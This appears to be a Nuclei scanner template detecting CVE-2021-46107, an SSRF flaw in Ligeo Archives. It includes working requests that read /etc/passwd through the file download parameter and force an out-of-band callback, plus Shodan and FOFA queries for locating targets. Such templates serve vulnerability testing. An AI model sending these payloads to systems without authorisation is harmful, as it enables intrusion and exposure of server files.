id: CVE-2021-46107 info: name: Ligeo Archives Ligeo Basics - Server Side Request Forgery author: ritikchaddha severity: high description: | Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features. remediation: | Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability. reference: - https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py - https://nvd.nist.gov/vuln/detail/CVE-2021-46107 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-46107 cwe-id: CWE-918 metadata: verified: true max-request: 3 shodan-query: title:"Ligeo" fofa-query: title="Ligeo" tags: cve,cve2021,ligeo,ssrf,lfr http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=file:///etc/passwd HTTP/1.1 Host: {{Hostname}} - | GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')" - "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"